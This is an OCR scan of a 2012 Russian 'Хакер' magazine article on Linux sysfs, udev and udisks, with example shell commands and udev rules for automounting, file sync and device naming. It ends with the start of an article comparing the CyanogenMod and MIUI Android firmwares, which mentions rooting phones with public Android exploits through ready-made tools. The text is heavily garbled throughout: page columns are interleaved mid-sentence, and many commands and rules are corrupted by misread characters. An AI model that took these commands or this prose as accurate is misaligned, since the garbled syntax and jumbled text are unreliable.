С наскоку разобраться в дереве каталогов sysfs проблематично. Но делать этого и не требуется,- файловая система никогда не
modul es. al ias
была предназ начена для ковыряния руками, поэтому мы перехо дим к обсужде нию инструментов, к ото рые наиболее полно исполь
В определенный момент для отладки всего этого хоэяйства
зую т ее возможности.
была реализована виртуальная файловая система ddfs IDevice Dгiveгs Fi leSystem], которая позволяла представить все отношения
IПDIJ
Зачем же нужна
К-объектов в виде дерева каталогов и файлов. Позднее файловую
sysfs, если ее нельзя потрогать, что называется,
систему переименовали в sysfs, и она стала неотъемлемой частью
голым и руками? В се дело в приложениях пространства пользова
модели драйверов Linux. Что же дает sysfs операционной системе?
теля. В Liпux никогда не существовало единого механизма управ
Так как
ления оборудованием, который могли бы использовать приложе
sysfs является визуальным представл ением связи всех
К-объектов ядра, а К-объекты- представлени ем оборудования,
ния, работающие вне ядра. Какую-то информацию можно было
установленного в компе, то мы получаем своего рода вход в святая
полу чить с помощью pгocfs, другую- с помощью iосt l -вызовов
свя тых операционной системы. Например, мы можем проследить,
к файла м устройств, третью - напрямую из памяти ядра !так де
как устройства объединены с помощью шин , на каком SАТА-порту
лает dmidecode]. Н о е диного интерфейса, который бы выдавал всю
висит жесткий диск, определить его производителя, модель,
под ноготную ком па, не было. И sysfs стала просто спасением для
характе ристики и даже изменить параметры работы. Собственно,
разр аботчиковсофтаи дистрибутивов: они получили инструмент,
почти все, что ядро знает про устройство и может с ним проделать,
с помо щью которого можно производить автоконфигурирование
можно узнать !и выполнить] с помощью чтения и записи файлов.
ОС. адекватно реагировать на горячее подключение устройств и соб ытия plug and play.
Приведу пример. Выполни следующую команду:
Первой разработкой, которая начала использовать sysfs на всю катушку, стал демон ud ev, предназначенный для автоматическо
$ cat /sys/class/ net /eth0/add r ess
го соз дания файлов устройств в каталоге /dev при подключении к компу нового устройства.
На экран будет выдан МАС-адрес сетевой карты ethO. Прочитав такую информацию, как скорость интерфейса , поддержку режима
ние USВ-принтера или отключение мышки. Вместе с информацией
дуплекса и многое другое.
Команда
Udev подключается к ядру с помощью
netliпk-coкeтa, по которому получает извещения !так называемые uevent] о происходящих в системе событиях, таких как подключе
другие файлы каталога /sys/class/net/ethO, ты сможешь выяснить
о соб ытии, а также данными о самом устройстве, демон получает
cat /sys/ Ьl ock/s d a/s i ze выведет на экран размер
путь к каталогу внутри
диска sda, представленный в 512-байтных блоках.
sysfs, представляющему подключенное
уст ройство. На основе данных, полученных из sysfs, и написанных
А команда
заранее правил демон создает файл устройства внутри /dev, давая
# ec ho pe r formance > /sys/devices/system/cpu/cpu0/cpufreq/sca l ing_gove rn or переведет первое ядро процессара !или все сразу, если про цессор не поддерживает раздельное управление] в режим макси маль ной производительности. Кроме демонстрации возможност ей
sysfs, эти примеры показывают еще одну особенность файловой с истемы. Обрати внимание, что в качестве nервого элемента пути используются разные по сути имена каталогов: class, Ыосk, devices. Но это не бардак в головах разработчиков, а фича фай ловой системы. Дело в том, что добраться до любого устройства с помощью sysfs можно несколькими путями:
> cd /sy s/c l ass/ ata_dev ice/ dma / ata_I in k/ dmi 1 a ta_por tl drm/ firmware / back 1ight/ bd i/ gp i o/ Ыосk / graph ics / bsg / hidraw/ > cd / s ys/c lass /scsi_dis k/ > Is В :В :В :В ll:B:B :B S :B:B:B > cd В : В \ :В\: В \: В
ХАКЕР
в ядре;
scsi _d is k/
vc/
pci_bus /
scsi_host/
vi dea4 1 inux /
раwег _supply /
souпd/
vt conso le/
regu latar 1 rfki 11 / rtc / scsi_device /
sp i _masteг 1 thermal/ tt y/ usЫ
В \:В\:В\: В
а ll ow_гestart
в ид ит ядро;
те т !
misc/
net/
ba sh : cd: е: е : е : В : В : Нет такага Ф ё!Оnв uлu каталага
> cd > ls
арр_ tag_own
/sys/device / - де р ево уст р ойств так, как его / sys/Ьlock/ - бл о чны е уст р ойств а ; / sys/bus / - п еречень ш ин, заре ги с т р и рова нн ых
hwmon/ i2c-adapte r / ieeeBB211 / input/ leds /
~ a~he_typ e
de v i се FUR manage_staгt_stap
Х о ж дение по
is i on i ng_mode
р аwег
ргоv
i on_made pгatect i an _ t ype
subsys t em
p гa t ec t
sysfs мо же т з дорово
thin _p гa vi sion
ue vent
ing
з апутать
107
04 /159/2012
www.epidemz.net
UNIXOID KERHEL[?49?, 138282] ~dd / devi ces/ pc IBBBB: В В / ВВ В В : В В: 12 . 2/ usbl / 1- 4/ 1-4 : l .B/host 12/ t arge t 12 : В : В /1 2 :8 : В: B/ scs l _de v lce / 12 : В :8 : В ( sc s i_devic:e ) UOEV C?ll97. 138596] edd / de vl ces/ pc iBBBB: В В / ВВ В В : В В: 12 , 2/ usb l/ 1-4 / 1- ll : l . B/hos t l21terge t 12 : В : е
ls csl )
UOEV [ 7497. 138748 ] add В / 12 : В : В: В <sc:s i)
/ devi c:es / pc iBBBa : B BIIШBB: ВВ : 12 . 2 / usЫ / 1 - 4 / 1 -4 : 1 . B/host 12 / t aгget 12 : В:
UOE V {7497. 1311541 edd / devices / pc IBBBa : В В / В ВВ В : В В: 12 , 2/ usbl / 1- 4/ 1-4 : 1 . B/ host 12 / t erget 12 : В: B I1 2 : B : B : 0 / sc:s l _ d l s kЛ2 : B : В :В (scs l_d ls k:} KERHEL [7497. 1312 В ЭJ add / devices/ pc: i B tШa : ВВ /ВВ ВВ : В В: 12 . 2 / usЫ / 1 - 4 / 1-4 : 1, B/ host 12/ t aгge t l2 : В : B/ 12 :B:B: B/ bsg/ 12 :B:B: B (bsg) UOEV [7497 . l3ld52J edd / de vic es / p~: iBBBB : В В/8888 :88: 12. 2 / usЫ / 1 - .:1 / 1 - 4: 1 . 8/ host 1 2 / t !! гge t 12 : В: 8 / 12 : В : В : B / s~:s l_de v l c e / 12 : В: В : В 1scs i _dev i c e J UDEV [7497. 1326691 add / dev i ce s / pc i888B: 88/8888 :88: 12 . 2 / usЬl / 1- 4/ l-4: 1 , 8 / host 12 / t a г ge t 1 2 :8: 8 / 12 :8 :8: 8 / bsg / 12 :8 :8 :8 (bs g ) KEii!NEL[7497 . I'З2974J !!dd / de vic es / vi гtu e l / bd 1/ 8 :32 lbdi J UDEV [7497 .133159) e dd / de v ic e s /vi гtue l/ bdl / 8 :32 ( bd il KER NEL [7497 . 1333 121 e dd / de v ices/ pc i 888B : ВВ / ВВВВ :88 : 12 . 2 / usЫ / 1-4 / 1-4 : 1 . 8 /hos t 12 / taгge t 12 :8 : B / 12 : 8 : 8 : 8 /Ьlock / sdc
t Ы ock J
KE!<!NEL[7497 .1 357 181 ch!!nge 8 /1 2 : 8 : 8 : 8 /Ьlock / sdc
/ devi ces/ pc IBBBB:88/ 8888: ВВ : 12 , 2/usb1/ l - 4/ 1-4 : 1 . 8 / hos t: l2/terge t 12 : В:
I Ыock l
UDEV [7497 . 293648] add
/ devi ces/ pc i 8B8B :8ai8B88 : 88 : 12 . 2/usb l/ 1-4 / 1-4 : 1 B/hos t 12 / t arge t 12 : В :
8 /1 2 : 8 : 8:8 / Ьl oc k / sdc I Ыock l
UDEV {7497. 312889] chenge B /1 2 : 8 : 8 : 8 / Ыoc k/ s dc
Команда
«Udevadm
/ devl c e s / pc i BBBa : 88 / ВВВВ : ВВ: 12 . 2/ usb 1/ l - 4 /1-4 : 1 8 /host 12 / t e гge t l 2 :8 :
.
I Ыock J
monitor> ~ позволяет просмотр е ть события
udev в
р еж им е ре ального
> ud i sks
/ dev/s da
--s ho~o~-ln fo
Sho~o~tng
tn fo г me t lon ne t 1ve - p!lt h : c k/ s de devl ce : dev ice- fl le : presentet ton : by-id : by-id : by- !d : by- pe th : detected a t : sys t em l nt eгnel :
fог / oгg / fr ee d e sk t op /U D
1sks / devi ces/ sde / sys / devices / pc IBBBB: ВВ / ВВВВ: ВВ : 11 . B /hos t B / t a гget B : В : В /В : В : В
: 8 /Ь
lo
/ de v/ sde / de v/ sd!! / de v / d i sk / Ьу- 1 d/ et e-ST92583 15AS_6VC449FS / dev / d i sk / by- i d/scs 1-SATA_ST92583 15AS_6VC449FS / de v /d i з k / Ьу - 1 d / ~~.~~.&Л - 8х588 8с5ВВ22Б d 39бd /de v/ dl sk / by - path / pc 1-8888 : ВВ : 11. B- scs i - В : В : В : В Ч т . 82 ФеВр. 2В 1 2 28 :48:29 1
гe mov eble:
в
ho!ls med i e: det e cts chenge : detectlon Ьу po lli ng : det e ct l on ln hib tt aЬl e : det e c t ion inh lblted : l s г еаd on ly : l s moun t ed : mount pe t hs : mount ed Ьу u ld:
1 l detected a t
Ч т.
В2 Фе Вр .
2В 12
28 :48 :291
в в в в в в
Рез ул ьтат выполнения команды « udisks -- show- info /dev/sda »
вр е мени
ему нужные права и назначая minoг/majoг-нoмepa.
и им е нно поэтому ты можешь не заботиться о самос т оятельном
Кроме различных низкоуровневых файлов , описывающих
устройство [например, vendo г- производитель ,
mode l - модель
устройства! , в sysfs есть и еще один очень важ н ы й файл moda li as, содержащий строку вида
000010B8bc02sc00i00".
"pci:v000010ECd00 00 8139sv00001734sd
Это уникальный идентификатор у с трой
с тва, который используется
udev для
загр у зки н у жного мод уля
з апуске нужных приложений. При подключении веб-камеры на э кране сразу появляется окно менеджера фо т ографий, а при подключении принтера происходит его автоконфигурирование. Каждая среда использует свой набор приложений и сервисов для вз а имодействия с исп о л ьзу ют все,- э то
udev, но есть два udi sks и up owe г.
инструмента , которые
устройства . Он генерируется во время сборки ядра на о с нове к о да драйв е ров , каждый из которых с о держит с пи с ок ид е нтификат о ров
поддерживаемых устройств. Этот с писок сохраняе тс я в ф а йл /l iЬ/ modu les/ B ЕРСИ Я _ Я Д РА / mоdu les.alias, описывающ ий п се в д ои мена модулей для команды modpгobe. Все что остается с делать
udev
для з агру з ки нужного драйвера, это выполнить команд у modpгobe с аргументом в виде содержимого файла
modalias
устройства. Ты
можешь попробовать сде л ать это сам:
И UPOWER udisks и upoweг
UDISKS Де м о н ы
представляют собой менеджеры дисков
и пит а ния соответственно. Изначально они были частью проекта
Devic eK it, но к о гда многие компоненты последнего были перене udev, стали отд е льными проектами. Оба демона исполь зую т ud ev, sysfs и d-bus для получения информации о железе, сен ы в
н от ификаций о подключении дисков или изменении режима п и т ан и я и отправки этой информации вовне.
П е н а чалу м о жет показаться с транным, что при наличии
# modp robe pci:v000010ECd . ..
зна ющ е м о железе в с е, и Одно из самых важных качеств прошлей реализации
devfs,
udev,
отличающи х ег о о т
работающей внутри ядр а, сос тоит
udev,
sysfs,
информирующем о «железных
соб ы т ия х>> весь остальной мир, нужны еще какие -то внешние и н струме нты. На самом же деле существование
udisks
и upoweг
в том, что он позволяет пользова т елю контр о лир о вать процесс
дейст в ите льно важно, так как это не просто очередные н оти-
со здания файлов в каталоге /dev, а также з ап у скать ра з личные
фи катар ы , а полноценные менеджеры.
приложения на основе тех или иных параметров устрой с тва,
изве щ ен ия системы о подключении новых дисков [что и так без
полученных от
него дел ает udevl имеет встроенный интерфейс управления:
sysfs.
Такая особенность позволяет делать очень
Udisks,
например, кроме
интере с ные вещи,- например, назначать своей личной флешке
по запросу др у гого приложения он может выдать подробную
уникальное имя внутри /dev или запускать приложение син
инфо рмацию о на к опителе, его разметке, смонтирова т ь/раз
хронизации файлов, если в систему была воткнута цифровая
мо н т ир ов ать разделы, выполнить низкоуровневые операции над
камера. Все это делае т с я с п омощью udеv-правил. Системные
уст р о й ст вом, остановить шпиндель и так далее. Ч тобы проде
правила хранятся в ката л о г е /liЬ/udev/гules.d, а для пользовате
ла т ь э ти действия самостоятельно, приложению пришлось бы
лей и администра т оров предусмотрен каталог /etc/udev/гu l es.d.
им е ть права гооt на запись файлов в
Позже мы рассмотрим несколько примеров использования этого
же о н о м о жет прост о подключиться к
каталога.
у
Чтобы информировать другие службы об изменении кон фигурации устройств и подключении новых , шину
d-bus.
udev
использ у ет
Любое приложение, имеющее соответствующие
права, пр е до с тавленные тулкитом
Pol ic yKit,
може т п о дклю
Pol icy Kit
sysfs и d-bus,
монтирование, здесь запросить права
и слать запросы. Немаловажно также, что
udisks
уме
ет вы п о лн я ть поллинг устройств[например , для обнаружения ком п акт -диск а в привод е l, на чт о н е способен udev. Д е м он
ud isks
с набж е н у тилитой про с тран с тва пользователя ,
с п о м о щью которой можн о выполнить многие действия над на
читься к шине с целью получения ув е домлений и вы п олнения
к опите лями. Например , чт об ы просм о треть подробную инфор
о т ветных д е й с твий. Так делает любая ср е да рабочег о стола ,
ма ци ю обо вс ех ди с ка х с и с т е мы , можно выполнить следующую ко м а нд у :
$ udisks -- dum p
ЧТОБЫ ИНФОРМИРОВАТЬ
Для получения информации о конкр етном накопителе , включая
ДРУГИЕ СЛУЖБЫ ОБ ИЗМЕНЕНИИ
КОНФИГУРАЦИИ УСТРОЙСТВ И ПОДКЛЮЧЕНИИ НОВЫХ, ИСПОЛЬЗУЕТ ШИНУ
D-BUS
UDEV
м о д е ль , х арактери с тики и информацию
SMART:
$ udisks --show-info / dev / sda Дл я и з вл е ч е ния ди ска:
$ udisks --eject / dev/cdrom
ХАКЕР
108
www.epidemz.net
04/159/20 12
Зве н ья од н ой це п и
Export kernel
Kernel
object ~
(Ko bj ects)
Sysfs /sys ······························································ - fol ders are kobjects (ke rnel objects)
..
-
- files are object attributes - file content ls attribLite vaiLie
Driver core •.................. netlink
Uev ent
. . ... ~~~!!~~ .....
Gather info rm ation from sysfs
Udevd ............................................................. - remove duplicate uevents - ensure right u event order
Udev devic e create
.···························································.
-
collect i11formation from sysfs create device files add symllnks to devices in j d ev set permissions to devices
Pass uevents to udev
Get stored device information
1
Udev ev ent process ...............................................................................................
1
Udev database in memory
f
· - parse rules ln /etc/udevtrules .d/ and store in memory · - match uevent agalnst udev rules (identify device) - store device info rma tion to udev database
Store device informatlon
~ :...:. ~?. ~.~..~~ 9. ~~..~.?~ .~.~~~. ~ .~ :.i.~~:.~~..~?.~. ~ ~ ~ ~~.~.~........................: f..[)'В' ~~ё·~·~·~·~·~ t·i·~·~· . ) ~
lnstance
~
: ..............'/\ ...............
Notify userspace about devlce 1 Notify all other (interested ln dev ice) applica t ions
~
~.............
.............. ........ ...... Socke t .............. . DBusConnection ~ ~ DBusConnection lnstance lnstance · ··· ·· · · ··~ · ···· · ·· ·· ······
Socket
········ · · ·· · · ·~ · · ·· ··· · · ·
4;,:............................................. . . . . ~~~·~~~~·d;;~;t~~~; ..··u :
,."., ..,.,., .,~ ,.,
r:-:-:' .,:-:...,." ..
.. u{-,..,,." .,,.,.,.,.,.,.,.,., .,:-:.. ,." .. .,.--- - - - ,
DBu sConnection ~ lnstance
................................ Appl ication
ХХХ
DBus daemon p rocess Ар х ите к тура
udev к ак он а есть
Для установки таймаута на остановку диска:
н ость, связанную с управлением питанием. Он занимается тем, что следит за состоянием питания устройств, может уnравлять
$ udisk s --set-spindown / dev/s da --s pindown -t imeout
СЕКУНДЫ
режимами энергосбережения различ ны х ком п онентов ПК и и з
вещать систему о таких событиях, как п ерехо д на использование И, кстати говоря, все эт и дей ствия не nотребуют прав гооt. Со
аккумулятора и сильный нагрев винчестера или видеокарты.
вре м е нны е DE уже пер е шли на ис п ользование udisks в качестве
Пока он находится в начальной стадии разработки, поэтому
менеджера накопителей и и спользую т его даж е в утилитах раз
лишь немногие дистрибутивы задействуют его возможности,
метки дисков. Также есть несколько проектов создания ле г ковес
предпо чит ая использовать
ных демонов автомо н тиров ания, например
devmon. Пр осто уста нови udisks и devmon, а затем д обавь в конец файла -/.xsession строку !заменив fluxbox на свой менеджер окон!:
udev, sysfs и ACPI.
Как и udisks, upower имеет утилиту управления, однако един ственное, что можно получить от нее на данном этапе развития, это сводку о состоянии питания различных компонентов машины.
Сделать это можно с помощью команды «upower --dump». ехес
ck-lau nch-se ss io n bas h
-с
"devmon & flux box"
iiit•'t•o
Так ди ски будут м о нтировать ся автоматически.
Вернемся к sysfs и udisks и посмотрим, какие интересные вещи
Д емон upoweг предоставляет аналогичную функциональ-
ХАКЕР
можно сделать с их помощью. Н ачнем с sysfs:
04/1 59/ 2012
109
www.epidemz.net
UNIXOID 1.
Получение статистики использования сетевых интерфейсов :
$ gr ep -r . /sys/c l ass/ net /et he/s t at ist i cs 2. Ин формирование системы ото м , чтодиск не является меха н и ческим [позволяет сдела т ь ввод-вывод при ис п ользовании SS D чуточку быстрее!:
# ec ho
е
>
/sys/ Ьl ock/sd b /que u e/rot ational
updeted : hes histoгy : has stat ist ics : bat tе г у p г esent : rechargeab l е: s t ate :
Если ты хочешь
yes Thu Feb yes yes
2 17 :53: 26 2012 IB seconds ago )
са мостоятельно
разобраться во внутренностях
sysfs,
советую начать
yes yes
с каталога /sys/c lass, который сортирует
fully-chaгged
eneгgy:
~~
. 7108
eneгgy-empty:
0
~h
eneгgy-ful l :
~5.~767 ~h
устройства в более
~h
удоб ном для понимания виде.
eneгgy-ful l -design: ~8.8~ ~h
3. Принудительный рее ка н SСSI-устройств [например для добавле ния на лету новых разделов в виртуальной машине!:
0
vo l tage :
12.38 V 98.31587. 93.11367. l i th ium-i on
peгcentage: сарае
i ty: technalagy:
~
устройства есть файл
0 . ввв
содержа щий имя
majoг/minoг-нoмepa.
unknowп
Он используется
( геtе ):
1328183606
0 . В0В
sysfs uevent,
устройства и его
lcha гge ):
1328183606 Histoгy
Получение информации о питании каждого USВ-порта:
В каждом каталоге
ene г gy-гate :
Histoгy
# echo "- - -" > /sys/class/scsi_hos "lo/ hoste/scan
4.
ASUS K5BAF
v endoг :
model: power supply:
udev для
unknown
создания
файлов устройств во время загрузки.
$ f or i in ' find /sy s/ devi ces/*/*/ usb* \ -na me l eve l ' ; do echo -n "$i : "; cat $i ; done
Результат выполнения коман ды
«Upo wer
--dump н
разделы флешки в каталог /mnt. П ри выдергивании происходит
5.
Информация о компе [производитель, материнская плата и так
размонтирование.
далее!:
2. Синхронизация файлов: # ca t /sys/ dev i ces/virtual/d mi /id/*
ACT I ON== "add" , KERN EL== "sd</a-z><a-z><8-9>" , ENV{ IO_USB_DR I VER }= "usb -s torage" , RUN+= " / bin /c p -а / mnt /%k / backup/%k"
6. Температура процессора: # ca t
/sys/c l ass/ hwmon / hwmo ne / t em pl_ in pu t Это правило позволяет синхронизировать содержимое флешки
7. У п равление яркостью экрана [ макси м альная яркость прописана в /sys/class/backl ig ht/acpi_vi deoO/ma х_Ь гig htпessl:
с каталогом файловой системы [в данном случае /Ьасkuр/имя_ устройс тва! с помощью обычного ер. Е го следует поместить перед послед ней с т рокой предыдущего набора правил.
# ec ho 8 > /sys/c lass / backligh t/ acpi_videoe;bri ghtness
3. Назначение статичных имен сетевым картам: 8. П еревод системы в спящий реж и м [вместо mem можно использо вать d isk для гибернации ! :
SUBSYSTE M= ="net" , ATTR {address}== "aa:bb:cc:dd:ee:ff" , NAME= " lane " SUBSYSTEM== "net" , ATTR {address}== "ff:ee:dd : cc:bb:aa" , NAME= "wlane"
# ec ho mem > /sys/ power/s t ate Это только малая часть того, что можно сделать, используя
sysfs. В любом случае, лучше самостоятельно покопаться в недрах
Правила проверя ют МАС-адрес устройства и на его основе на
значают имя. Строка ATTR{addгess} позволяет получить содержи
файловой системы с помощью файлового менеджера.
Те п ерь по г овор и м об udev. Д емон udev имеет систему пра
мое файла addre5s внутри каталога устройства в sy5fs.
вил, которые оп и сы в аю т то, ка к он именует создаваемые фай л ы устройс т в, какие пр а ва и м назначает и что делает после созда
4. Автоматическое отключение тачпада при подключении мыши:
ния. Правила имеют прос т ой формат и помещаются в файлы вну
три кaтaлoгoв/liЬ/udev/гules.d [системный! или /etc/udev/гules.d. По соглашению все файлы правил имеют префикс в виде цифры,
который опре д еляет поря д ок их загрузки. Мы назовем свой файл
/etc/udev/гules.d/99-custom.гules . Что в него можно помести т ь?
1. Автомонтирование:
ACТION == "a dd " ,
SUBSYSTEM== "input" , KERNEL== " mouse[l-9]" , ENV{ DI SPLAY} =":e.e· , ENV{XAU THO R IТY}= "/ home / USERNAМE / .Xauthority" ,
ENV{ID_CLASS}= "mouse " , RUN+= "/usr/Ьin/synclient TouchpadOff=l" ACTION== "remove " , SUBSYSTEM== "input" , KERNEL == "mouse[l-9]" , ENV{DISPLAY}= ":e.e" , E NV{XAU THO RПY}= " / home / USERNAМE / .Xauthority" ,
AC TION == "add" , KERNEL== "sd<a-z><8-9>" , ENV{IO_USB_ORIVER}= "usb-storage" , RUN+="/bin/mkdir -р /mnt/%k " ACTION == " add " , KERNEL== "sd</a-z><a-z><8-9>" , ENV { IO_USB_DRIVER} ="usb-storage" , RUN+="/bin/mount -о rw,noexec,dmask=eee,fmask=lll,utf8 / dev/%k /mnt/%k " ACTION== "remove" , KERNEL= =" sdc/a-z><a-z >< 8-9 >" , ENV { IO_USB_DRIVER}= " usb-storage " , RUN+=" / bin / umount /mnt/%k "
ENV{ ID_CLASS }= "mouse" , RUN+= "/usr/Ьin/ synclient TouchpadOff=e" Правила используют утилиту sy п client для отключе ния тач п ада,
если в систему воткнуто устройство с и м енем ти п а /dev/mouseO,
/dev/mo usel и так далее.
l:l§!:r.J!t§i Файловая система sysfs не только позволила Linux сделать
большой шаг вперед на пути к интеллектуальному деск т опу, способному к самоконфигурированию, но и дала гикам отличный инструмент для управления оборудованием. В э т ой статье мы рас
Э т а самый простой вариант автомонтирования, который работа
смотрели лишь часть возможностей комплекса
sysfs+udev+udisks.
ет то л ько в от н ошении US В- фле ш ек. П равила п роверя ют устрой
Вероятно, ты сможешь nридумать и более изощрен н ые способы
ство на прина д леж н ос т ь к классу USB Mass Stoгage и мо н тируют
его испол ь зования.
I
ХАКЕР
110
www.epidemz.net
04/159/2012
UNIXOID
Евгений Зобнин (execЬit.rul
ЗЕЛЕНЫХ РОБОТОВ ~
.-
-
~
... -
. _,
ВЫБИРАЕМ АЛЬТЕРНАТИВНУЮ ANDROID-ПPOШИBKY: CYANOGENMOD VS Какую альтернативную прошивку
ПРЕДИСЛОВИЕ Cyanogen Mod
MIUI
nочти с момента nояв л ения nерво г о смартфона
Andгoid выбрать для установки
С т рого говоря,
на свой девайс? Наверняка ты
оnерационной системы Andгoid. Каждый из них
Cyanogen [насто ящее имя - Ст ив Кондик, не так
вкл юч ает в себя ог ромное количество измене
давно о н начал работать в комnании Samsungl,
не раз задавался этим вопросом .
Существует множество самы х разнообразны х прошивок для сотен устройств, однако среди
и
MIUI
не альтер
нативные nрошивки, а самые на стоящие форки
ний , ко торые из-за nолитики
никогда не
JesusFгeke. Изначально
развиваются большой командой разработчиков,
ставлял собой nр ос т ую модификацию ори г и нального Andгoid, ус тановленного насмартфон
T-Mobi le G1 [Andгoid 1.5/. Однако nозднее, nосле nрисоединения к Cya nogen других разработчи
[наnример, существует nорт Cyan ogen Mod на
они получили столь широкое
Оп е, - дума ю, о нем
ков и откры т ия ко д а оnера ц ио н ной системы,
большинство читате л ей вряд ли с лышали!.
она nревратилась в настоя щ и й форк, сборка
Geeksphone
Какую nрошивку выбрать для своего апnарата
которого осуществлялась из собственно г о реnо
-решай сам, я же nомогу тебе оnределиться,
зитария исходных текстов, вклю ч ающе г о в себя
рассказав о возможностях и тонк ост ях работы
множество nоnравок в оригинальные исходни
с каждой из них.
ки , оnубликованные
ХАКЕР
отвечают
десятки разработчиков с о всего мира, а база
загрузить и х на свой девайс, сейчас .
Go ogle. Cyanogen Mod
Сегодня за развитие
распространение, и как
обо всем этом ты узнаешь прямо
nред
разнообразные и экзо тические устройс тв а с мартфон
CyanogenMod и MIUI. В чем
CyanogenMod
которые выnолняю т nорты nроши вки на сам ые
настоящих бриллиантов только
и х преимущества, почему
который взял за осно ву nрошивку, создан н ую
nоnадут в официальную версию ОС. Оба nроек та
всего этого разнообразия
два:
nод уnравлен ием Andгo i d. Ее создал энтузиаст с xda-developeгs, скрывающийся nо д ником
о фициально nоддерживаемых устройств вклю чает в себя
56
моделей с мартфонов и nланше
Итак, CyanogenMod [cyanogenmod .com l. На
т о в , среди которых есть как тоnавые девайсы
верное, самая nоnулярная nрошивка Andгoid
тиnа
из всех существующих. Ведет свою историю
жетные устройства вро д е Н ТС
Google Nexus S и
Н ТС lncгediЫe, так и бюд
Tattoo
и
Huawei
111
04/159/2012
www.epidemz.net
UNIXOID \!!
"
Fl!fflleMJJI
1
olll (iil (•) 19 57
'':'1 -
выполнять опасные для пол ь зователя функ
'-
ции [например, отправлят ь С М С]. Встроенный клиент О репV РN , имею щ ий
662
графический интерфейсдля настройки.
Он
Д оработки в камере [например, фу н кция
tap-to-focus ], номеронабирателе и СМС приложении.
2"
3 '
4"
5"'
б ~-. .
7
8 1 Цl
9 w~
9
#
*
Ok ,р
У правля ем при в илегиями
Настройки производитель
nрило же ния в
ности в
CyanogenMod
iiiKiit•l=ltt!i
Впечатляет, не правда л и? Теперь попробуем
@
Номеронабират е ль и СМС-nрилож е ни е
с март. Что для это г о нужно ? Все то же самое,
что и для установки любой другой прошивки:
MIUI
гооt-доступ, кастомная консоль восстанов л ения
CyanogenMod
[гесоvегуl, сама прошивка и набор закрытых и
Неофициальные версии прошивки для
U8220.
прямоввыпадающейпанелиуведо м лений.
уста н овить это чудо инженерной мысли на свой
.s>..
Гд•
Кнопкиуправленияфункциямисмартфона
десятков других моделей м ожно найти на фору-
ssh,
при подключении с помощью
•
Gооglе-приложе н ий [ М аркет, Gmail и прочие ] .
кото ры е позволяют комфортно работать
SSH
или
Получив гооt, мы сможем изменить Ьооt-раздел
adb.
xda-developers .com . П оследняя стабильная версия прошивки имеет номер 7.1.0 и основана на коде Andгoid 2.3.7. Также ведется работа
Для запуска SSH-cepвepa можно использо
внутренней NА N О-памяти, что по зво лит за
вать графический интерфейс.
писать в него модифицированную консоль
Меню настроек существенно расширено
восстановления [которая, в отл и чие от штатной,
над девятой версией прошивки, базирующей-
и включает в себя множество пунктов для
с п особна уста на вливать прошивки без цифро
ся на коде Android 4.0.3 [предполагалась, что
тонкоготюнинга ОС.
вой подписи производите л я аппарат а].
версия
П оддержкатем,разработанныхком п анией
мах
8.0
будет основана на Andгoid
в связи с отказом
3.0,
но
выкладывать ее код
П о умолчанию в And г oid поль зователь гооt не
Т- Mobile. Темы устанавливаются с помощью
имеет пароля, но получить его права невозмож
в свободный доступ образовался разрыв между
Android
версиями]. Несмотря на сырость CyanogenMod
В состав прошивки включена поддержка
логина [/b in/loginl или изменения UID 1/Ьin/su] .
формата
П оэтому систему необходимо поломать с помо
9,
в Сети уже можно найти множество ее сборок
Maгk et.
но из-за отсутствия в системе ин струментов для
FLAC.
Доработан н ое меню перезагрузки, с помо
для различных устройств.
отличия и возможности Чем же так хорош Cyanogen Mod, почему он
за
Вручную делать это совсем не обязательно:
прямо в консоль восстановления.
для Andгoid можно воспользова т ься прило
П оддержка
жением zгoot [goo.gl/mp6wg ], а в Windows или
Wi-Fi, Bluetooth
и USВ-тизеринга
служил свою популярность? Ответов здесь два.
[эта функциональность появилась в СМ е щ е
Во-первых,
до ее анонса в Andгoid 2.2].
CyanogenMod
создан гиками и для
щью одного из множества Аndгоid-эксплойтов.
щью которого можно перезагрузи т ь телефон
Linux- SupeгOneCiick [goo.gi/H ibN ], которое можно запустить с помощью mono. Обе софтины
гиков, поэтому в его комплекте есть множество
Вс т роенный эквалайзер, который работает
используют распрос траненные дыры в Andгoid,
инструментов,полезныхпродвинутомуnоль
в отношении всех при ложений.
а поэтому способны зарут ить множество различ
зователю: например, встроенный SSH-cepвep,
Многочисленные оптимиза ции и доработки
ных устройств. Е сли не заработают, попробуй
интерфейс тюнин г а низкоуровневых параме
в низкоуров н евой части ОС, включая пере
найти руков о дство для своего девай са в
тров ОС и полноценная консоль с
работанную библиотеку
Во-вторых, в разработке
Механизм строгих ограничен ий, п оз воляю
гесоv егу. SupeгOneCiick делает это автомати
щий зап ретитьт ем или иным приложениям
чески, для всего остального есть
bash и busybox . CyanogenMod при
нимает участие большое количество независи
google.
Далее необходимо установи т ь кастомный
Bionic.
Rom
Manageг,
мых разработчиков, каждый из которых может реализовать интересную идею и рассчитывать,
что его патч будет принят в основную базу кода. В результате в
CyanogenMod
r ~ SuperOneCiick
""'-
можно найти
множество очень оригинальных доработок, таких как интерфейс управления питанием
-
в выпада 'ющей панели, механизм принудитель ного ограничения приложений в возможностях,
встроенный эквалайзер и так далее. П люс ко всему
CyanogenMod
включает в себя большое
r.i!l.alng ВшуВох ~~)Aootng devк:e -Siept:1 Root.ngdevice - Siep.::-2
Поддержка /etc/init.d. В CyanogenMod, как и в
"""'"""""'' . Rootngdevк::e
можно создавать загрузочные скрипты
"""'""""""
samba или ftpd] и команд [для оптимизации управления памятью, например].
CyanogenMod есть собственный,
более прозрачный механизм установки при
1
........
· Siep::З
Slep::4
Rootngdevice -Siep : 5 · Siep ::6 -Step ~7 Remcк.rtng / system v.'th read-v.rte а Cre.!:ng /q-stemh:Ьin .. lni!tь\ngsu VsystemJ'Jdln) .. · Step :: 1 nstallngsu VI)'Stemh:lжi) ... ·Siep r:2 lnsta:8'1gsu Vq·s:tern.hЬn) ... ·Siep .;:З N!aling$ц)efllser -Step.:t\ 01edong for Ьus:,tюx Remou-ulg /~r,-i!l.em wih read-oNy ее .
"""'""""~
для запуска сторонн ихдемонов [например,
памяти. В
""'-
kut!JngbyВox~~)
и чего нет в стандартном
Во зможность установки приложений на карту
""''"" St.anServer \VмforOevce
Get\юgrnarU<К't~.rer. ~VeniOn
Andгoid:
Linux,
Sl.ёl'trlgADBServer
\'.'aitf19lordevlc.e
a-.edmg t rooted ..
Вот далеко не полный список того, что
11
""'""' ADBCommм.d
""""""'""·
н о поднимают производительность аппарата.
CyanogenMod,
11
""'
~/ФBServer
количество оптимизаций, которые действитель
есть в
=
@) . . . . . .
~(.,ptrv,м;'
Ge!Property GetPrwet!)• ChecklfRooted
""""' """"""""' """""""'
Т)-ре
т.,.
4.05s 0.04s
